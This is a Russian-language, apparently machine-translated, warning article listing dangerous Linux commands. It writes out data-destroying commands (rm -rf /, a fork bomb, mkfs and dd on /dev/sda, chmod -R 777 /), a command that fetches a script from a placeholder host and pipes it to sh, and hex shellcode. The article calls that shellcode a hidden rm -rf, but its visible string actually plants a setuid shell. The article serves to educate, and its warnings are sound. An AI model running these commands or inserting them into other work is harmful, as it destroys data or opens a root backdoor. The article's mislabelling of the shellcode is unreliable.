Самые опасные команды — их никогда не следует выполнять в Linux
Интерфейс командной строки — мощная и удобная утилита для администрирования системы Linux. Он обеспечивает быстрый и универсальный способ запуска системы, особенно при управлении автономными системами, не имеющими графического интерфейса.
Хотя командная строка полезна для управления вашей системой, она таит в себе риски. Выполнение неверных команд может нанести непоправимый вред вашей системе. В этом руководстве мы собрали список некоторых самых рискованных команд, о выполнении которых в вашей системе не следует думать.
1. rm -rf /Команда
команда rm — это команда Linux, используемая для удаления файлов и каталогов в зависимости от используемых аргументов. Однако следует соблюдать крайнюю осторожность при использовании команды rm, поскольку небольшая опечатка или ошибка могут привести к невосстановимому повреждению системы.
При выполнении от имени пользователя root с опцией -rf /
команда рекурсивно удаляет все файлы и каталоги в вашей системе, начиная с корневого каталога (/)
, который является самым высоким в Linux. Структура иерархии файлов. Короче говоря, команда rm -rf /
полностью уничтожает вашу систему, что приводит к ее поломке и невозможности восстановления.
Некоторые параметры, используемые с командой rm:
- Команда rm в Linux используется для удаления файлов.
- Команда rm -r рекурсивно удаляет папку, даже пустую.
- Команда rm -f удаляет «Файл только для чтения» без запроса.
- rm -rf /: принудительно удалить все в корневом каталоге.
- rm -rf * : принудительно удалить все в текущем/рабочем каталоге.
- rm -rf . : принудительное удаление текущей папки и подпапок.
Фактически, когда вы запустите команду от имени обычного пользователя, вы получите на терминале два предупреждения.
Чтобы избежать случайного удаления файлов с помощью команды «rm», создайте псевдоним команды 'rm' как 'rm -i' в файл “.bashrc”, он будет просить вас подтвердить каждое удаление.
2. :(){:|:&};: Команда
Вышеупомянутое на самом деле является вилочной бомбой. Он работает путем создания функции под названием ':'
, которая вызывает себя дважды: один раз на переднем плане и один раз в фоновом режиме. Функция выполняется повторно и при этом потребляет все системные ресурсы, что приводит к сбою системы.
Фактически, команда «вилочная бомба» — это, по сути, форма DoS-атаки (отказ в обслуживании). Его также называют вирусом Ваббит или Кролик. Хуже всего то, что вам не нужно быть пользователем root, чтобы запустить эту атаку.
К счастью, вы можете защитить себя от этой атаки, ограничив количество процессов, запускаемых локальными пользователями, примерно до 4000.
Вы можете сделать это, выполнив команду:
ulimit -S -u 4000
Позже вы можете проверить это с помощью команды:
ulimit -u
3. команда > /dev/sda
Выполнение команды, за которой следует >/dev/sda
, перезаписывает блок /dev/sda
на вашем жестком диске. Этот блок содержит данные файловой системы, и его перезапись приводит к повреждению системы, которое невозможно восстановить.
4. папка mv /dev/null
Еще одна вредная операция, которую не следует выполнять, — это перемещение каталога или файла в /dev/null
. Файл /dev/null
— это файл особого типа, известный как нулевое устройство или «черная дыра». Все, что перемещается в /dev/null
, отбрасывается и уничтожается.
Следующая команда перемещает все содержимое домашнего каталога пользователя в /dev/null
, тем самым удаляя все данные, содержащиеся в домашнем каталоге пользователя.
mv /home/user/* /dev/null
5. wget http://malicious_source -O- | ш
Команда wget — это команда, которая загружает файлы с веб-сайта или файлового сервера. Приведенная выше команда загружает скрипт из вредоносного источника и затем выполняет его.
6. mkfs.ext3 /dev/sda
Команда mkfs создает новую файловую систему (ext2, ext3, ext4 и т. д.) на отформатированном устройстве хранения данных, в большинстве случаев это раздел жесткого диска. Выполнение команды mkfs для раздела стирает все хранящиеся в нем данные.
Форматирование всего диска (например, mkfs.ext3 /dev/sda) полезно при форматировании разделов диска, но приводит к сбою системы и оставляет ее в невосстановимом состоянии. Это происходит потому, что он уничтожает все системные файлы вместе с вашими личными данными.
Команда также может принимать другие формы, как показано ниже.
mkfs.ext4 /dev/sda
mkfs.xfs /dev/sda
mkfs.btrfs /dev/sda
7. > команда «Файл»
Файл >
удаляет содержимое файла и оставляет его пустым. Это синоним команды cat /dev/null > file. Поэтому следует соблюдать осторожность при использовании операторов перенаправления в системе Linux.
Ниже приведена демонстрация того, как эта команда перезаписывает текстовый файл. Вы можете себе представить катастрофу, которую может вызвать эта команда, если задействованный файл является файлом конфигурации.
8. ^foo^бар
Команда ^foo^bar
настолько же опасна, насколько и полезна, в зависимости от того, как она выполняется. Хотя это позволяет вам редактировать ранее выполненные команды и выполнять их снова, это может иметь катастрофические последствия, если вы не заинтересованы в изменениях, внесенных в команды перед их запуском.
9. dd if=/dev/random of=/dev/sda
Приведенная выше команда удаляет блок /dev/sda и записывает в него случайные ненужные данные. Ваша система останется на нестабильной и необратимой стадии.
10. Чмод -Р 777/
Хотя это может и не привести к немедленному сбою вашей системы Linux, команда chmod -R 777 /
рекурсивно назначает все разрешения (чтение, запись и выполнение) всем файлам в вашей системе Linux, начиная с корня.
Это фактически предоставляет доступ ко всем критически важным файлам конфигурации и другим файлам всем пользователям, что представляет собой огромный риск для безопасности вашей системы. Любой, у кого гнусные намерения, может изменить важные файлы и легко сломать вашу систему.
11. Скрытый приказ
Команда ниже — это не что иное, как первая команда выше (rm -rf)
. Здесь коды спрятаны в шестнадцатеричном формате, чтобы неосведомленный пользователь мог обмануться. Запуск приведенного ниже кода в вашем терминале сотрет ваш корневой раздел.
Эта команда показывает, что угроза может быть скрытой и иногда ее обычно невозможно обнаружить. Вы должны осознавать, что делаете и каков будет результат. Не компилируйте и не запускайте коды из неизвестного источника.
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
Примечание. Не выполняйте ни одну из приведенных выше команд в терминале или оболочке Linux, а также на компьютере друга или в школе. Если вы хотите их протестировать, запустите их на виртуальной машине.
Любая несогласованность или потеря данных из-за выполнения вышеуказанной команды приведет к поломке вашей системы, за которую ни Автор статьи, ни Tecmint не несут ответственности.
Это все на данный момент. Скоро я снова буду здесь с еще одной интересной статьей, которую вы с удовольствием прочтете. А до тех пор оставайтесь с нами и будьте на связи с Tecmint.
Если вы знаете какие-либо другие подобные Опасные команды Linux и хотите, чтобы мы добавили их в список, сообщите нам об этом через раздел комментариев и не забудьте оставить ценный отзыв.